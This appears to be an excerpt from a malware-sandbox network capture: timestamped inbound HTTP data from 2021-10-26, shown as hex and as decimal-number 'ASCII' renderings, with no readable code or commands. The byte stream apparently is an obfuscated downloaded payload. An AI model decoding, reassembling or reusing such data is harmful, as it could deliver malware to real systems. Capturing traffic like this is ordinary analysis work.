                    2021-10-26 16:59:45 UTC3546INData Raw: 38 38 20 38 33 20 34 38 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 31 20 35 30 20 31 33 34 20 32 34 39 20 35 34 20 32 33 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 34 39 20 35 34 20 31 39 36 20 31 31 34 20 31 31 37 20 31 30 39 20 34 33 20 35 30 20 34 38 20 33 35 20 33 30 20 31 31 39 20 31 31 35 20 31 31 37 20 31 30 33 20 31 31 30 20 33 31 20 35 38 20 32 30 20 37 32 20 39 36 20 31 31 34 20 31 31 37 20 31 30 35 20 39 32 20 35 36 20 32 37 20 34 39 20 36 30 20 31 32 37 20 31 33 34 20 39 33 20 32 31 35 20 31 31 32 20 35 30 20 35 34 20 37 36 20 31 31 37 20 38 34 20 31 31 34 20 31 31 33 20 38 34 20 32 37 20 35 30 20 34 38 20 35 30 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 38 38 20 34 39
                    Data Ascii: 88 83 48 51 38 84 114 117 109 101 50 134 249 54 23 52 117 109 113 33 0 49 54 196 114 117 109 43 50 48 35 30 119 115 117 103 110 31 58 20 72 96 114 117 105 92 56 27 49 60 127 134 93 215 112 50 54 76 117 84 114 113 84 27 50 48 50 72 23 114 117 105 31 188 49
                    2021-10-26 16:59:45 UTC3551INData Raw: 31 30 39 20 39 39 20 32 20 35 36 20 35 30 20 31 20 38 34 20 31 31 34 20 31 31 37 20 31 31 20 31 31 32 20 35 30 20 33 33 20 34 39 20 35 30 20 31 32 34 20 35 35 20 31 31 37 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 32 31 20 31 36 20 34 32 20 34 39 20 31 31 37 20 31 30 39 20 31 31 36 20 33 37 20 34 30 20 34 33 20 34 36 20 32 31 37 20 30 20 31 31 37 20 31 30 39 20 31 31 33 20 34 33 20 32 39 20 34 32 20 31 36 20 38 33 20 31 30 30 20 31 31 39 20 32 32 35 20 35 36 20 35 30 20 34 38 20 35 31 20 31 34 38 20 38 33 20 31 30 31 20 31 31 35 20 32 30 37 20 31 31 39 20 32 36 20 31 33 34 20 35 30 20 35 34 20 38 32 20 38 38 20 31 32 37 20 37 30 20 31 36 37 20 35 37 20 32 37 20 32 31 32 20 35 34 20 37 31 20 36 36 20 31 32 35 20 31 30 39 20 37 32 20 35 30 20 34 38 20 35
                    Data Ascii: 109 99 2 56 50 1 84 114 117 11 112 50 33 49 50 124 55 117 109 118 43 29 21 16 42 49 117 109 116 37 40 43 46 217 0 117 109 113 43 29 42 16 83 100 119 225 56 50 48 51 148 83 101 115 207 119 26 134 50 54 82 88 127 70 167 57 27 212 54 71 66 125 109 72 50 48 5
                    2021-10-26 16:59:45 UTC3555INData Raw: 32 20 32 33 30 20 31 31 36 20 31 31 34 20 31 31 37 20 31 31 31 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 31 32 34 20 31 34 39 20 31 31 37 20 31 30 39 20 31 31 38 20 32 32 36 20 34 34 20 35 30 20 35 34 20 38 36 20 39 30 20 35 31 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 32 31 33 20 35 34 20 38 34 20 31 31 36 20 31 36 35 20 31 31 39 20 31 31 32 20 35 30 20 35 30 20 32 36 20 31 31 32 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 31 35 31 20 35 30 20 34 38 20 35 32 20 33 30 20 31 36 32 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 39 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 35 37 20 31 31 37 20 31 30 39 20 31 31 38 20 38 33 20 32 34 20 32 32 30 20 35 34 20 38 34 20 31 31 36 20 39 35 20 31 30 39 20 31 31 32 20 34 39 20 30 20 35 36 20 35
                    Data Ascii: 2 230 116 114 117 111 88 116 48 50 60 124 149 117 109 118 226 44 50 54 86 90 51 109 112 56 24 213 54 84 116 165 119 112 50 50 26 112 84 114 127 69 151 50 48 52 30 162 114 117 107 88 194 48 50 48 124 157 117 109 118 83 24 220 54 84 116 95 109 112 49 0 56 5
                    2021-10-26 16:59:45 UTC3559INData Raw: 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 32 36 20 31 31 33 20 35 30 20 35 34 20 39 34 20 31 31 32 20 31 31 38 20 31 31 33 20 39 33 20 34 39 20 32 32 20 32 30 20 32 38 20 34 31 20 34 32 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 30 30 20 35 30 20 35 34 20 38 34 20 31 31 33 20 36 39 20 31 30 33 20 31 31 32 20 32 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 33 20 34 36 20 33 31 20 34 36 20 31 31 34 20 39 20 34 35 20 31 30 39 20 31 31 32 20 35 34 20 35 31 20 34 31 20 34 35 20 31 32 31 20 39 38 20 38 33 20 31 30 35 20 31 30 38 20 34 30 20 32 39 20 36 33 20 31 36 20 31 32 34 20 31 39 33 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 32 32 20 32 35 20 32 30 38 20 31 31 34 20 38 39 20
                    Data Ascii: 4 84 114 117 109 114 26 113 50 54 94 112 118 113 93 49 22 20 28 41 42 117 109 116 25 200 50 54 84 113 69 103 112 20 48 50 54 84 114 117 109 114 43 46 31 46 114 9 45 109 112 54 51 41 45 121 98 83 105 108 40 29 63 16 124 193 117 109 118 24 22 25 208 114 89
                    2021-10-26 16:59:45 UTC3563INData Raw: 38 32 20 37 20 31 34 36 20 31 34 33 20 36 31 20 31 31 31 20 31 38 20 31 37 38 20 37 38 20 31 31 34 20 31 31 37 20 31 32 20 32 34 30 20 31 31 31 20 34 38 20 35 30 20 35 30 20 34 32 20 31 39 20 31 31 37 20 31 30 39 20 31 31 36 20 34 35 20 31 39 33 20 38 34 20 38 33 20 35 30 20 32 30 20 31 36 20 31 31 20 32 31 20 38 34 20 38 35 20 31 30 39 20 32 37 20 37 30 20 38 32 20 32 30 37 20 31 39 38 20 31 31 32 20 35 30 20 31 37 36 20 31 31 31 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 30 37 20 31 34 20 31 30 39 20 34 38 20 35 30 20 35 30 20 39 35 20 31 32 20 34 30 20 31 30 39 20 31 31 32 20 35 34 20 31 36 20 31 33 36 20 31 35 37 20 38 34 20 31 31 34 20 37 30 20 37 31 20 31 30 35 20 31 39 31 20 31 39 20 35 30 20 35 34 20 38 35 20 39 37 20 31 32 33 20 31 32 34 20 31
                    Data Ascii: 82 7 146 143 61 111 18 178 78 114 117 12 240 111 48 50 50 42 19 117 109 116 45 193 84 83 50 20 16 11 21 84 85 109 27 70 82 207 198 112 50 176 111 54 84 118 94 107 14 109 48 50 50 95 12 40 109 112 54 16 136 157 84 114 70 71 105 191 19 50 54 85 97 123 124 1
                    2021-10-26 16:59:45 UTC3567INData Raw: 20 35 30 20 34 38 20 35 30 20 38 39 20 38 34 20 31 31 34 20 31 30 30 20 31 31 31 20 31 31 20 38 30 20 34 38 20 35 30 20 35 30 20 37 38 20 39 35 20 31 32 30 20 37 35 20 31 31 34 20 33 38 20 33 38 20 33 30 20 36 30 20 31 31 34 20 38 34 20 31 31 35 20 36 35 20 39 38 20 32 35 20 35 38 20 35 36 20 32 39 20 31 36 35 20 31 35 20 32 33 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 31 39 35 20 34 38 20 35 39 20 31 31 20 31 31 37 20 31 30 39 20 31 32 32 20 34 38 20 33 36 20 34 37 20 32 37 20 38 37 20 38 34 20 38 33 20 37 31 20 31 33 20 38 31 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 33 38 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 32 20 35 34 20 34 39 20 31 31 34 20 31 31 37 20 31 30 39 20 30 20 35 30 20 34 38 20 33 35 20 35 33 20 36 36 20 39 33 20
                    Data Ascii: 50 48 50 89 84 114 100 111 11 80 48 50 50 78 95 120 75 114 38 38 30 60 114 84 115 65 98 25 58 56 29 165 15 23 109 112 54 27 195 48 59 11 117 109 122 48 36 47 27 87 84 83 71 13 81 48 50 50 127 138 117 109 112 33 0 52 54 49 114 117 109 0 50 48 35 53 66 93
                    2021-10-26 16:59:45 UTC3571INData Raw: 20 35 34 20 38 32 20 32 39 20 34 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 33 38 20 32 30 30 20 38 32 20 32 32 33 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 32 34 31 20 35 31 20 35 34 20 38 32 20 32 39 20 32 34 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 33 38 20 32 30 30 20 38 32 20 32 32 31 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 32 34 39 20 35 31 20 35 34 20 38 32 20 32 39 20 31 32 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 32 36 20 31 36 39 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 37 30 20 35 31 20 34 38 20 35 32 20 38 39 20 31 39 35 20 31 31 35 20 31 31 37 20 31 30 37 20 39 30 20 34 39 20 30 20 35 39 20 35 34 20 36 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 30 20 31 31 39 20 31 31 35 20
                    Data Ascii: 54 82 29 4 108 112 52 54 38 200 82 223 117 109 118 65 241 51 54 82 29 24 108 112 52 54 38 200 82 221 117 109 118 65 249 51 54 82 29 12 108 112 52 54 26 169 84 114 115 69 70 51 48 52 89 195 115 117 107 90 49 0 59 54 69 114 117 109 112 50 48 50 30 119 115
                    2021-10-26 16:59:45 UTC3574INData Raw: 20 34 31 20 37 31 20 38 32 20 32 20 37 31 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 32 31 35 20 31 30 37 20 31 31 31 20 33 38 20 31 36 20 38 33 20 32 38 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 31 34 34 20 34 38 20 37 35 20 31 30 33 20 38 35 20 36 20 39 30 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 32 30 37 20 31 31 38 20 34 35 20 33 38 20 31 38 20 33 35 20 31 32 36 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 31 34 38 20 38 32 20 32 34 32 20 32 34 20 31 30 39 20 31 31 32 20 35 34 20 32 36 20 35 36 20 31 34 20 31 36 37 20 31 34 33 20 31 33 38 20 31 34 36 20 32 34 30 20 38 39 20 34 38 20 35 30 20 35 30 20 31 30 38 20 37 37
                    Data Ascii: 41 71 82 2 71 160 44 24 205 54 84 116 215 107 111 38 16 83 28 132 108 93 146 112 50 54 144 48 75 103 85 6 90 226 46 26 201 84 114 115 207 118 45 38 18 35 126 162 107 69 143 50 48 52 148 82 242 24 109 112 54 26 56 14 167 143 138 146 240 89 48 50 50 108 77
                    2021-10-26 16:59:45 UTC3578INData Raw: 38 34 20 31 30 35 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 32 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 36 38 20 34 38 20 35 30 20 35 30 20 31 33 32 20 38 31 20 31 31 37 20 31 30 39 20 31 31 33 20 32 36 20 31 31 38 20 35 30 20 35 34 20 39 34 20 31 30 37 20 32 36 20 30 20 31 31 33 20 35 30 20 35 38 20 37 36 20 36 34 20 38 34 20 31 31 34 20 31 31 33 20 31 38 39 20 31 31 30 20 35 30 20 34 38 20 34 31 20 33 30 20 31 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 36 20 39 33 20 39 33 20 35 31 20 35 34 20 39 34 20 31 32 20 33 20 31 30 39 20 31 31 32 20 35 34 20 32 32 34 20 31 20 35 34 20 38 34 20 31 31 35 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 31 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34
                    Data Ascii: 84 105 93 43 112 50 58 42 89 57 115 117 103 14 68 48 50 50 132 81 117 109 113 26 118 50 54 94 107 26 0 113 50 58 76 64 84 114 113 189 110 50 48 41 30 18 114 117 103 106 93 93 51 54 94 12 3 109 112 54 224 1 54 84 115 93 43 112 50 58 41 89 57 115 117 103 14
                    2021-10-26 16:59:45 UTC3583INData Raw: 20 31 32 30 20 37 37 20 31 30 30 20 31 31 34 20 35 30 20 34 38 20 37 36 20 36 39 20 38 34 20 31 31 34 20 31 31 33 20 39 39 20 31 31 36 20 33 35 20 35 33 20 31 36 38 20 37 39 20 33 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 20 31 32 31 20 34 38 20 35 30 20 35 35 20 35 39 20 32 34 32 20 31 31 36 20 31 30 39 20 31 32 32 20 31 30 20 32 31 39 20 35 31 20 35 34 20 38 34 20 31 32 20 36 20 31 30 39 20 31 31 32 20 35 34 20 36 32 20 35 34 20 33 39 20 38 31 20 32 33 32 20 31 32 20 31 39 36 20 31 31 32 20 35 30 20 34 39 20 36 37 20 31 35 39 20 38 34 20 31 31 34 20 31 31 36 20 32 20 32 34 31 20 35 31 20 34 38 20 35 36 20 31 34 20 31 35 33 20 31 31 35 20 31 31 37 20 31 30 39 20 31 34 20 36 35 20 34 38 20 35 30 20 35 30 20 39 30 20 31 31 38 20 31 30 30 20 31 30 34 20
                    Data Ascii: 120 77 100 114 50 48 76 69 84 114 113 99 116 35 53 168 79 31 114 117 108 1 121 48 50 55 59 242 116 109 122 10 219 51 54 84 12 6 109 112 54 62 54 39 81 232 12 196 112 50 49 67 159 84 114 116 2 241 51 48 56 14 153 115 117 109 14 65 48 50 50 90 118 100 104
                    2021-10-26 16:59:45 UTC3587INData Raw: 20 38 30 20 31 32 20 34 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 32 35 31 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 36 37 20 31 31 32 20 35 30 20 35 38 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 38 35 20 32 31 32 20 34 38 20 34 38 20 35 30 20 37 32 20 33 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 34 20 36 37 20 34 38 20 35 30 20 35 30 20 35 39 20 32 32 35 20 31 31 36 20 31 30 39 20 31 32 32 20 31 39 30 20 31 39 20 35 30 20 35 34 20 38 35 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 38 20 31 38 30 20 35 32 20 38 34 20 31 31 34 20 31 31 20 32 34 20 31 31 32 20 35 30 20 35 32 20 37 36 20 37 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 32 32 38 20 35 31 20 34 38 20 35 36 20 38 39 20 31 39 33 20 31 31 35 20 31 31 37 20 31 30 33
                    Data Ascii: 80 12 4 109 112 54 95 251 54 84 120 26 167 112 50 58 93 109 84 114 127 85 212 48 48 50 72 33 114 117 105 14 67 48 50 50 59 225 116 109 122 190 19 50 54 85 29 46 109 112 56 8 180 52 84 114 11 24 112 50 52 76 71 84 114 113 2 228 51 48 56 89 193 115 117 103
                    2021-10-26 16:59:45 UTC3591INData Raw: 35 30 20 35 38 20 33 35 20 34 38 20 35 39 20 32 31 39 20 31 31 36 20 31 30 39 20 31 32 32 20 33 30 20 36 33 20 35 33 20 33 39 20 38 30 20 36 20 31 30 30 20 31 30 39 20 31 31 32 20 35 31 20 37 37 20 34 33 20 35 34 20 38 34 20 31 31 38 20 39 34 20 37 37 20 31 36 30 20 36 31 20 34 38 20 35 30 20 35 35 20 31 32 34 20 35 32 20 31 31 37 20 31 30 39 20 31 32 32 20 33 35 20 35 34 20 39 33 20 31 35 39 20 38 35 20 31 31 34 20 31 32 37 20 36 35 20 31 32 35 20 35 33 20 33 33 20 35 34 20 36 36 20 39 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 33 20 34 30 20 34 38 20 35 30 20 35 30 20 36 39 20 31 32 30 20 39 38 20 35 33 20 39 39 20 35 36 20 33 33 20 35 36 20 33 39 20 39 35 20 32 35 32 20 31 39 34 20 39 35 20 32 34 37 20 31 38 20 32 30 33 20 33 30 20 32 33 30 20 37 34
                    Data Ascii: 50 58 35 48 59 219 116 109 122 30 63 53 39 80 6 100 109 112 51 77 43 54 84 118 94 77 160 61 48 50 55 124 52 117 109 122 35 54 93 159 85 114 127 65 125 53 33 54 66 91 114 117 108 13 40 48 50 50 69 120 98 53 99 56 33 56 39 95 252 194 95 247 18 203 30 230 74
                    2021-10-26 16:59:45 UTC3595INData Raw: 20 36 34 20 37 31 20 34 38 20 35 30 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 39 37 20 34 39 20 35 30 20 34 38 20 34 35 20 36 32 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 34 20 35 30 20 35 34 20 38 35 20 38 38 20 31 30 32 20 39 33 20 31 31 34 20 35 30 20 32 30 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 31 38 20 37 36 20 32 38 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 31 36 20 32 34 36 20 36 33 20 38 34 20 31 31 34 20 32 34 39 20 33 33 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30 31 20 38 35 20 31 31 34 20 31 31 35 20 32 30 20 36 30 20 35 30 20 34 38 20 35 31 20 37 31 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 39 30 20 33 33 20 30 20 34 38 20
                    Data Ascii: 64 71 48 50 186 24 114 117 108 88 97 49 50 48 45 62 117 109 113 67 124 50 54 85 88 102 93 114 50 20 50 54 84 126 117 109 97 18 76 28 230 74 90 138 109 112 52 16 246 63 84 114 249 33 112 50 49 26 101 85 114 115 20 60 50 48 51 71 24 114 117 108 90 33 0 48
                    2021-10-26 16:59:45 UTC3599INData Raw: 38 36 20 31 30 30 20 39 35 20 31 30 36 20 31 30 33 20 31 30 36 20 34 36 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 38 20 31 30 32 20 39 31 20 35 30 20 35 35 20 35 38 20 37 20 31 37 38 20 31 30 31 20 39 35 20 31 32 36 20 36 34 20 34 39 20 34 38 20 31 31 35 20 35 34 20 38 34 20 31 31 34 20 32 35 35 20 31 30 39 20 31 31 32 20 33 35 20 35 30 20 32 36 20 31 30 36 20 38 35 20 31 31 34 20 31 31 35 20 31 31 39 20 39 33 20 33 34 20 32 32 20 35 33 20 38 39 20 35 35 20 31 31 35 20 31 31 37 20 31 30 33 20 38 30 20 35 30 20 33 32 20 35 30 20 35 34 20 31 30 31 20 39 30 20 39 34 20 31 31 30 20 31 32 33 20 32 35 20 32 32 32 20 35 33 20 32 32 20 31 36 39 20 31 32 35 20 31 31 37 20 31 30 39 20 33 31 20 31 34 31 20 34 39 20 35 30 20 36 30 20 31 31 36 20 31 38 36 20 36
                    Data Ascii: 86 100 95 106 103 106 46 31 53 114 89 118 102 91 50 55 58 7 178 101 95 126 64 49 48 115 54 84 114 255 109 112 35 50 26 106 85 114 115 119 93 34 22 53 89 55 115 117 103 80 50 32 50 54 101 90 94 110 123 25 222 53 22 169 125 117 109 31 141 49 50 60 116 186 6
                    2021-10-26 16:59:45 UTC3603INData Raw: 20 34 39 20 31 36 20 31 31 34 20 38 38 20 38 20 32 34 39 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 31 31 33 20 36 39 20 31 30 30 20 31 31 32 20 34 35 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 38 20 37 35 20 31 36 36 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 36 39 20 32 34 36 20 35 30 20 34 38 20 35 36 20 36 36 20 31 30 36 20 31 31 34 20 31 31 37 20 31 31 31 20 31 30 31 20 33 31 20 35 31 20 32 30 20 31 36 20 31 32 36 20 31 35 20 32 32 35 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 32 30 32 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 31 31 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 34 20 37 33 20 31 36 35 20 35 30 20 35 34 20
                    Data Ascii: 49 16 114 88 8 249 112 50 52 25 206 84 113 69 100 112 45 48 50 54 84 114 117 109 114 48 75 166 54 84 118 118 69 246 50 48 56 66 106 114 117 111 101 31 51 20 16 126 15 225 109 112 54 27 202 54 87 66 124 109 111 50 48 50 54 84 114 117 111 114 73 165 50 54
                    2021-10-26 16:59:45 UTC3606INData Raw: 39 39 20 31 31 39 20 31 32 32 20 31 30 38 20 33 31 20 35 35 20 32 30 20 37 37 20 32 30 33 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 32 37 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 33 37 20 32 39 20 34 39 20 31 36 20 31 31 34 20 38 38 20 38 20 32 34 32 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 39 37 20 36 39 20 31 31 30 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 38 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 34 20 34 31 20 33 39 20 33 31 20 34 39 20 31 31 34 20 39 20 32 31 33 20 31 30 39 20 31 31 32 20 35 34 20 32 36 20 32 30 20 32 39 20 31 36 33 20 31 31 34 20 31 31 38 20 39 33 20
                    Data Ascii: 99 119 122 108 31 55 20 77 203 114 117 105 90 20 27 197 54 87 66 124 109 127 50 48 50 54 84 114 117 111 115 37 29 49 16 114 88 8 242 112 50 52 25 206 84 97 69 110 112 61 48 50 54 88 114 117 124 114 41 39 31 49 114 9 213 109 112 54 26 20 29 163 114 118 93
                    2021-10-26 16:59:45 UTC3610INData Raw: 39 37 20 35 34 20 31 39 30 20 31 33 33 20 34 20 31 38 31 20 31 31 36 20 32 35 31 20 32 31 38 20 31 30 32 20 31 20 34 32 20 34 39 20 33 30 20 31 33 31 20 31 31 35 20 31 31 37 20 31 30 33 20 33 31 20 32 33 34 20 34 39 20 35 30 20 36 30 20 39 34 20 38 39 20 31 32 31 20 31 31 30 20 38 38 20 32 32 39 20 34 39 20 35 30 20 36 30 20 35 39 20 31 37 30 20 31 31 36 20 31 30 39 20 31 32 32 20 35 36 20 35 30 20 34 39 20 35 30 20 38 32 20 32 39 20 32 33 36 20 31 30 38 20 31 31 32 20 35 32 20 32 33 38 20 32 37 20 31 39 20 31 32 34 20 36 32 20 31 31 37 20 31 30 39 20 31 32 32 20 36 32 20 35 30 20 37 33 20 31 37 33 20 38 34 20 31 31 34 20 31 31 33 20 31 32 36 20 31 31 37 20 33 35 20 35 33 20 33 30 20 36 33 20 36 39 20 31 31 39 20 31 31 39 20 31 30 31 20 33 31 20 32 35 34
                    Data Ascii: 97 54 190 133 4 181 116 251 218 102 1 42 49 30 131 115 117 103 31 234 49 50 60 94 89 121 110 88 229 49 50 60 59 170 116 109 122 56 50 49 50 82 29 236 108 112 52 238 27 19 124 62 117 109 122 62 50 73 173 84 114 113 126 117 35 53 30 63 69 119 119 101 31 254
                    2021-10-26 16:59:45 UTC3615INData Raw: 20 31 38 38 20 31 33 35 20 31 20 31 36 20 36 37 20 31 31 30 20 38 38 20 39 38 20 38 36 20 34 38 20 37 35 20 31 37 31 20 35 34 20 38 34 20 31 31 38 20 31 30 32 20 31 30 34 20 39 37 20 35 35 20 32 38 20 33 39 20 32 39 20 38 37 20 31 32 30 20 39 34 20 31 33 30 20 39 37 20 35 35 20 35 30 20 34 38 20 37 37 20 32 32 35 20 31 31 34 20 31 31 37 20 31 30 35 20 32 35 34 20 31 33 33 20 39 35 20 31 33 31 20 35 35 20 38 34 20 31 31 36 20 31 31 39 20 32 32 20 32 30 32 20 35 30 20 34 38 20 35 34 20 33 37 20 38 32 20 39 39 20 31 31 35 20 36 39 20 32 34 38 20 35 30 20 34 38 20 35 36 20 33 39 20 38 32 20 39 30 20 32 35 32 20 31 30 39 20 31 31 32 20 35 36 20 35 30 20 37 33 20 31 34 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 34 39 20 35 31 20 34 38 20 35 36 20 33 32 20
                    Data Ascii: 188 135 1 16 67 110 88 98 86 48 75 171 54 84 118 102 104 97 55 28 39 29 87 120 94 130 97 55 50 48 77 225 114 117 105 254 133 95 131 55 84 116 119 22 202 50 48 54 37 82 99 115 69 248 50 48 56 39 82 90 252 109 112 56 50 73 141 84 114 113 2 149 51 48 56 32
                    2021-10-26 16:59:45 UTC3619INData Raw: 31 31 34 20 34 38 20 37 35 20 31 35 39 20 35 34 20 38 34 20 31 31 38 20 31 31 39 20 32 32 20 32 32 33 20 35 30 20 34 38 20 35 34 20 38 39 20 32 30 33 20 31 31 35 20 31 31 37 20 31 30 37 20 39 30 20 34 38 20 34 39 20 33 34 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 38 34 20 31 31 32 20 34 30 20 39 39 20 35 30 20 34 39 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 39 39 20 32 20 35 32 20 35 30 20 32 32 20 38 35 20 31 31 34 20 31 31 37 20 32 34 30 20 31 31 32 20 35 30 20 33 33 20 34 38 20 38 39 20 32 31 39 20 31 31 35 20 31 31 37 20 31 30 37 20 39 33 20 35 31 20 32 36 20 34 38 20 37 37 20 32 34 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 39 20 33 31 20 31 39 20 32 30 20 35 32 20 34 37 20 32 31 38 20 31 31 37 20 31 30 39 20 31 31 36 20 34 30 20 32 39
                    Data Ascii: 114 48 75 159 54 84 118 119 22 223 50 48 54 89 203 115 117 107 90 48 49 34 54 84 112 117 84 112 40 99 50 49 84 114 117 109 99 2 52 50 22 85 114 117 240 112 50 33 48 89 219 115 117 107 93 51 26 48 77 243 114 117 105 109 31 19 20 52 47 218 117 109 116 40 29
                    2021-10-26 16:59:45 UTC3623INData Raw: 31 31 34 20 31 31 37 20 32 33 32 20 32 30 32 20 38 31 20 32 30 37 20 32 31 31 20 32 30 31 20 31 34 38 20 32 34 39 20 35 36 20 32 31 30 20 32 31 31 20 39 31 20 31 35 39 20 34 20 31 34 39 20 31 37 20 31 32 37 20 32 31 35 20 33 37 20 31 38 20 31 38 39 20 31 35 38 20 31 39 33 20 31 34 32 20 32 31 36 20 31 36 30 20 32 37 20 31 34 32 20 31 38 31 20 31 37 39 20 38 39 20 31 33 35 20 31 39 36 20 32 31 37 20 34 33 20 39 32 20 31 37 39 20 34 31 20 32 33 34 20 33 31 20 32 34 35 20 32 33 34 20 31 34 36 20 31 39 34 20 31 33 34 20 37 36 20 31 37 37 20 37 20 31 32 33 20 31 37 32 20 31 32 33 20 32 33 35 20 32 30 39 20 31 35 38 20 35 33 20 39 30 20 31 31 31 20 37 32 20 32 38 20 32 30 34 20 31 30 39 20 38 20 31 39 20 37 35 20 32 32 31 20 31 30 33 20 35 32 20 31 34 35 20 32
                    Data Ascii: 114 117 232 202 81 207 211 201 148 249 56 210 211 91 159 4 149 17 127 215 37 18 189 158 193 142 216 160 27 142 181 179 89 135 196 217 43 92 179 41 234 31 245 234 146 194 134 76 177 7 123 172 123 235 209 158 53 90 111 72 28 204 109 8 19 75 221 103 52 145 2
                    2021-10-26 16:59:45 UTC3627INData Raw: 30 37 20 33 38 20 31 30 32 20 31 34 20 32 34 20 31 32 33 20 31 33 37 20 32 34 37 20 38 31 20 34 32 20 33 37 20 31 33 34 20 31 35 30 20 31 33 30 20 31 33 37 20 34 38 20 31 39 31 20 31 37 35 20 31 38 33 20 31 38 30 20 32 31 37 20 33 31 20 31 34 38 20 30 20 31 30 36 20 37 39 20 31 38 37 20 31 33 36 20 37 33 20 32 33 39 20 31 37 34 20 37 35 20 31 39 36 20 34 38 20 35 20 31 35 37 20 31 33 35 20 35 36 20 39 37 20 32 33 33 20 31 32 33 20 31 32 31 20 37 36 20 32 39 20 32 30 35 20 32 31 34 20 32 35 30 20 32 31 36 20 34 39 20 38 37 20 33 30 20 32 33 35 20 31 32 38 20 32 32 33 20 33 36 20 31 39 34 20 32 34 32 20 32 30 20 31 38 31 20 31 30 38 20 32 33 32 20 32 35 34 20 33 35 20 39 33 20 31 37 37 20 31 36 32 20 31 38 34 20 31 39 20 32 31 33 20 31 30 20 31 38 31 20 34
                    Data Ascii: 07 38 102 14 24 123 137 247 81 42 37 134 150 130 137 48 191 175 183 180 217 31 148 0 106 79 187 136 73 239 174 75 196 48 5 157 135 56 97 233 123 121 76 29 205 214 250 216 49 87 30 235 128 223 36 194 242 20 181 108 232 254 35 93 177 162 184 19 213 10 181 4
